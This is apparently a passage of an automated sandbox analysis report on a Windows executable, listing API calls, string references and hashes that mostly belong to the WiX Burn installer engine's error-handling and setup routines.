                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentErrorFileLastProcessRead
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2959708427-3721239626
                                                                                                                                                                                                                                                                            • Opcode ID: 8c33a6f9b2d15d492c84b752e50d7a68918ec0f68bbc045c2169c5901acc83bc
                                                                                                                                                                                                                                                                            • Instruction ID: ccb38506a4842702eb3e593e2e3ac4ebf0e1d31e8994272dbb686ebb6bf636ca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c33a6f9b2d15d492c84b752e50d7a68918ec0f68bbc045c2169c5901acc83bc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5410731A80319B6E7129A66CC4BFBF7A68FB55B14F204155BB10FB2C2D3B49D009799
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000040,?,00000040,00000000,00000000,0100147D,?,?,?,008E41A9,?,?,?,00000000), ref: 008E5A5C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E41A9,?,?,?,00000000), ref: 008E5A68
                                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,008E41A9,?,?,?,00000000), ref: 008E5B05
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E41A9,?,?,?,00000000), ref: 008E5B11
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: EnvironmentErrorExpandLastStrings
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate buffer for expanded string.$Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\envutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 4064601616-3610958334
                                                                                                                                                                                                                                                                            • Opcode ID: 8b94c1c519248538d085666a9802f7498df8638f7603b63fc3928a03de7f7178
                                                                                                                                                                                                                                                                            • Instruction ID: 59c05544cea2c3191690d42c935d6dfa2bbb4d06009c15f3f955300724655d35
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b94c1c519248538d085666a9802f7498df8638f7603b63fc3928a03de7f7178
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1941AA36A81A7577DB3296468C4EF5F3D68FB83BA9F110125FE04FF180E6748900D691
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 009401F5
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 0094022F
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00940340
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094034B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                            • String ID: Failed getNamedItem in XmlGetAttribute(%ls)$Failed get_attributes.$Failed get_nodeValue in XmlGetAttribute(%ls)$Failed to allocate attribute name BSTR.$Failed to copy attribute value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 760788290-2059256487
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0093FDA6
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0093FDE3
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 0093FDF4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.reason., xrefs: 0093FD8A
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.errorCode., xrefs: 0093FCD3
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0093FCE2
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.linepos., xrefs: 0093FD5E
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.line., xrefs: 0093FD35
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.filepos., xrefs: 0093FD0C
                                                                                                                                                                                                                                                                            • Failed to query IXMLDOMParseError.srcText ., xrefs: 0093FDC7
                                                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                                                                            • String ID: Failed to query IXMLDOMParseError.errorCode.$Failed to query IXMLDOMParseError.filepos.$Failed to query IXMLDOMParseError.line.$Failed to query IXMLDOMParseError.linepos.$Failed to query IXMLDOMParseError.reason.$Failed to query IXMLDOMParseError.srcText .$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3341692771-2297621156
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemTime.KERNEL32(?), ref: 008E90C8
                                                                                                                                                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 008E90DC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E90E8
                                                                                                                                                                                                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 008E915C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E9166
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2700948981-1940114245
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0093BA8E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 0093BA98
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 0093BAF7
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 0093BB09
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID: "%ls" %ls$D$Failed to allocate full command-line.$Failed to create process: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 161867955-2095590911
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 008E9B0E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 008E9B15
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E9B21
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                                                                                                                            • String ID: DllGetVersion$Failed to create msi.dll version from QWORD.$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp$msi
                                                                                                                                                                                                                                                                            • API String ID: 4275029093-1657635385
                                                                                                                                                                                                                                                                            • Opcode ID: 086ee1e6524693a8e47ffd361b36850b658124fe7d1b16885dc51de46b1c2296
                                                                                                                                                                                                                                                                            • Instruction ID: 025bd4d13af241426ad83dfefddbf24f0832943cfc22524d30b07266bbcafcc9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 086ee1e6524693a8e47ffd361b36850b658124fe7d1b16885dc51de46b1c2296
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96310632E4023AB6E7219B6ADC06FAF7668EB46B25F010115FA44FA2C0D6E49C0487E0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B0E2: EnterCriticalSection.KERNEL32(0097D4F0,00000000,00000000,00000001,0000000C,0000000C,?,008FA885,00000000,00000001,00958FA8,?,00000000,00000000,0000000C,00000000), ref: 0093B0F7
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B0E2: LeaveCriticalSection.KERNEL32(0097D4F0,?,008FA885,00000000,00000001,00958FA8,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 0093B2F9
                                                                                                                                                                                                                                                                            • OpenEventLogW.ADVAPI32(00000000,Application), ref: 008FA9D3
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 008FA9DF
                                                                                                                                                                                                                                                                            • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,00958E3C,00000000), ref: 008FAA36
                                                                                                                                                                                                                                                                            • CloseEventLog.ADVAPI32(00000000), ref: 008FAA3D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                                                                                                                                            • String ID: Application$Failed to open Application event log$Setup$_Failed$d:\a\wix4\wix4\src\burn\engine\logging.cpp$log
                                                                                                                                                                                                                                                                            • API String ID: 1844635321-122217184
                                                                                                                                                                                                                                                                            • Opcode ID: 9e7065bccba6ec76a52de849453127f6336c4325d9903aad4166acea572085a8
                                                                                                                                                                                                                                                                            • Instruction ID: 15fbe89c1eb077884bffec76e18e5fbb37d7b536ea826ce2da09ae5f8ce68ddf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e7065bccba6ec76a52de849453127f6336c4325d9903aad4166acea572085a8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F01F7A2A459757AB33162376C0DE7B1D6CFBC3F6AB010114FE25F6181E6544C09C2F2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,?,?,0094526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,008E6CF2,00000000), ref: 0093C9ED
                                                                                                                                                                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,0094526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,008E6CF2,00000000), ref: 0093CA1B
                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,?,?,0094526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,008E6CF2,00000000), ref: 0093CAA2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Enum$InfoQuery
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate string bigger for enum registry key.$Failed to allocate string to minimum size.$Failed to determine length of string.$Failed to enum registry key.$Failed to get max size of subkey name under registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 73471667-3057206726
                                                                                                                                                                                                                                                                            • Opcode ID: 28db1a78e2afc7b0592bd2bbebe386d6e82d4d27ecab5dffce139b46e5ca84fd
                                                                                                                                                                                                                                                                            • Instruction ID: 65bd6720d19e6e75143a956a9ff77186d712b422d26f86e8f3e3ca188dcd7836
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28db1a78e2afc7b0592bd2bbebe386d6e82d4d27ecab5dffce139b46e5ca84fd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A413BB6610628BBEB11DB55CC49FAF7AADEF86B10F124029B608F7240E5709D01DB71
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,00000000,?,00000000,?,00000000,7FFFFFFF,?,00000000,7FFFFFFF,?,00000000,?,00000005,00000000), ref: 009422B9
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to canonicalize the directory.$Failed to canonicalize the path.$Failed to get length of canonicalized directory.$Failed to get length of canonicalized path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp$wzDirectory is required.$wzDirectory must be a fully qualified path.$wzPath is required.
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-3471778437
                                                                                                                                                                                                                                                                            • Opcode ID: 912f375fbca697955fa0964e0c44c1cc3a42c74cde591b0593a80d303c73fffc
                                                                                                                                                                                                                                                                            • Instruction ID: a56f0844a0e8874fdda5d9bf01058689ce5651fecf619830e1e146c08faeda23
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 912f375fbca697955fa0964e0c44c1cc3a42c74cde591b0593a80d303c73fffc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30411631B80315BAEB209B958C8AFAF66ACFF55F44F904164B714BB1D1E7F48E009651
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000082,?,?), ref: 0090D55B
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0090D56A
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB,?), ref: 0090D57E
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0090D58E
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0090D59E
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 0090D612
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0090D675
                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0090D6EE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • =======================================, xrefs: 0090D63E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Long$Proc$MessagePostQuitSleep
                                                                                                                                                                                                                                                                            • String ID: =======================================
                                                                                                                                                                                                                                                                            • API String ID: 305784972-300222271
                                                                                                                                                                                                                                                                            • Opcode ID: e3b75acf3a633a67385657a9b030867c383ed3c9ea2088cee006a7cf1cf2f2b1
                                                                                                                                                                                                                                                                            • Instruction ID: 0830d1ebd562c1f6572379a70e997a0290ac93595b36fedb85b42ee2dc7f2c13
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3b75acf3a633a67385657a9b030867c383ed3c9ea2088cee006a7cf1cf2f2b1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8151F775505114FFCB15AFB8CC8AF6E3A69FF45310F154114FA1EEB1A2DB368D009AA2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to find variable.$Failed to format variable '%ls' for condition '%ls'$Failed to get if variable is hidden.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$Failed to store formatted value for variable '%ls' for condition '%ls'$d:\a\wix4\wix4\src\burn\engine\condition.cpp$feclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-821846985
                                                                                                                                                                                                                                                                            • Opcode ID: 85565413b8b119aa7f99e7e59d42c69620901e0371b02561af6afc66014516bc
                                                                                                                                                                                                                                                                            • Instruction ID: cfcaf6e786706aee43dcaad1f59995a7f08e389d4af3daaed55a413d8b07f6fb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85565413b8b119aa7f99e7e59d42c69620901e0371b02561af6afc66014516bc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF412B7268035477DB229A5B8C4AFAB7A78FB47B14F014115FE00FE2C1E2A1DD1497E2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,008E6CF2,00000000,?,?,?,0091A0C7,00000000,008E6CF2,00000000,00000000,00000000), ref: 0091A123
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0091A0C7,00000000,008E6CF2,00000000,00000000,00000000,?,0091C452,00000000,00000000,00000000,00000000,00000000), ref: 0091A133
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorEventLast
                                                                                                                                                                                                                                                                            • String ID: Failed to append cache action.$Failed to append checkpoint before package start action.$Failed to append rollback cache action.$Failed to create syncpoint event.$Failed to plan cache for package.$Failed to plan package cache syncpoint$d:\a\wix4\wix4\src\burn\engine\plan.cpp
                                                                                                                                                                                                                                                                            • API String ID: 545576003-3436273000
                                                                                                                                                                                                                                                                            • Opcode ID: c06764651f5ea1f3577d8373260a77ffc571051077eba350f4ea4b276d0a68f5
                                                                                                                                                                                                                                                                            • Instruction ID: b114ba7e45f56ebd73097291d48f77d680694286008ead585aaf0aa8d3a143c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c06764651f5ea1f3577d8373260a77ffc571051077eba350f4ea4b276d0a68f5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4441E771B81728BBE7128B54CC49FEAB6A8AB45B14F110455FD04AF281E3B49D80D7A1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000001,80000005,00000000,00000000,00000000,00000000,00000003,000007D0), ref: 008FD752
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to allocate access for Administrators group to path: %ls, xrefs: 008FD605
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 008FD6DD, 008FD736
                                                                                                                                                                                                                                                                            • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 008FD633
                                                                                                                                                                                                                                                                            • Failed to create ACL to secure cache path: %ls, xrefs: 008FD6E8
                                                                                                                                                                                                                                                                            • Failed to allocate access for Users group to path: %ls, xrefs: 008FD68F
                                                                                                                                                                                                                                                                            • Failed to allocate access for Everyone group to path: %ls, xrefs: 008FD661
                                                                                                                                                                                                                                                                            • Failed to secure cache path: %ls, xrefs: 008FD724
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeLocal
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2826327444-3214910189
                                                                                                                                                                                                                                                                            • Opcode ID: 78295d41b8c86afc125a954cf6a89c25b702f887e5f11ac4de080e0808fad1fc
                                                                                                                                                                                                                                                                            • Instruction ID: e8466ebae4be6ac4cbb5edfb78892ae42b8c9bc259127f686de34185f65cc33c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78295d41b8c86afc125a954cf6a89c25b702f887e5f11ac4de080e0808fad1fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C410532B8032D76E731A6658C0AFFB6A69FB40F15F114050BB48FE1C1EAE0AD4487E5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00000105,?,0100147D,?,00000105,00000000,00000000,0100147D,?,00000000,008E6570), ref: 008E470D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FullNamePath
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for full path.$Failed to get current directory.$Failed to get full path for string: %ls$Failed to get max length of input buffer.$Failed to reallocate space for full path.$GetFullPathNameW results never converged.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Directory search: %ls, did not find path: %ls, xrefs: 008F0725
                                                                                                                                                                                                                                                                            • Directory search: %ls, failed get to directory attributes. '%ls', xrefs: 008F0703
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F06F3, 008F06F8, 008F0715, 008F0773
                                                                                                                                                                                                                                                                            • Failed to format variable string., xrefs: 008F069E
                                                                                                                                                                                                                                                                            • Failed to initialize file search., xrefs: 008F0671
                                                                                                                                                                                                                                                                            • Directory search: %ls, found file at path: %ls, xrefs: 008F0741
                                                                                                                                                                                                                                                                            • Failed to set variable., xrefs: 008F0761
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Directory search: %ls, did not find path: %ls$Directory search: %ls, failed get to directory attributes. '%ls'$Directory search: %ls, found file at path: %ls$Failed to format variable string.$Failed to initialize file search.$Failed to set variable.$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • File search: %ls, did not find path: %ls, xrefs: 008F09B4
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F0982, 008F0987, 008F09A4, 008F0A02
                                                                                                                                                                                                                                                                            • Failed to format variable string., xrefs: 008F092D
                                                                                                                                                                                                                                                                            • File search: %ls, failed get to file attributes. '%ls', xrefs: 008F0992
                                                                                                                                                                                                                                                                            • Failed to initialize file search., xrefs: 008F0900
                                                                                                                                                                                                                                                                            • Failed to set variable., xrefs: 008F09F0
                                                                                                                                                                                                                                                                            • File search: %ls, found directory at path: %ls, xrefs: 008F09D0
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable.$File search: %ls, did not find path: %ls$File search: %ls, failed get to file attributes. '%ls'$File search: %ls, found directory at path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000008,?,00000000,00000000,00000000,00000000,00000008,?,00000000,00000000,?,?), ref: 008FA0C3
                                                                                                                                                                                                                                                                            • ProcessIdToSessionId.KERNEL32(00000000), ref: 008FA0CA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\logging.cpp, xrefs: 008FA183
                                                                                                                                                                                                                                                                            • Failed to copy temp folder., xrefs: 008FA171
                                                                                                                                                                                                                                                                            • Failed to format session id as a string., xrefs: 008FA0F2
                                                                                                                                                                                                                                                                            • %u\, xrefs: 008FA0DE
                                                                                                                                                                                                                                                                            • Failed to get length of session id string., xrefs: 008FA11D
                                                                                                                                                                                                                                                                            • Failed to get temp folder., xrefs: 008FA0A8
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CurrentSession
                                                                                                                                                                                                                                                                            • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get temp folder.$d:\a\wix4\wix4\src\burn\engine\logging.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,?,0092262E,00000000,00000000,00000000,?), ref: 00943AAF
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0092262E,00000000,00000000,00000000,?,?,?,0091EE7E,458BF88B,?,?,?,00000000,00000000,?), ref: 00943ABC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0092262E,00000000,00000000,00000000,?,?,?,0091EE7E,458BF88B,?,?,?,00000000,00000000,?), ref: 00943ACE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
